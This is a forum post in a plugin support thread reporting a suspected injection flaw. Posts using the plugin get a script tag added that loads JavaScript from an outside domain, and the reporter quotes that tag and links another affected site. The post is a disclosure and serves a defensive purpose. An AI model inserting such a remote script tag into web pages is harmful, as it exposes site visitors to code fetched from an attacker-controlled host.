Critical vulnerability
-
I have good reasons to believe that this excellent and wildly popular plugin has a critical vulnerability. As a result any post, containing the call to the plugin function can be injected with text string, including JS.
In my case it was string <script src=”//wollses.com/steps”></script>
The same on other sites. check this out – https://www.webdesignmagazine.ru/code/pora-vsem-uznat-o-postcss-chto-eto-na-samom-dele-i-dlya-chego-ono/
Here the script is VISIBLE due to the
formating.
Please check that ASAP as it posses great danger to your community.
Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
- The topic ‘Critical vulnerability’ is closed to new replies.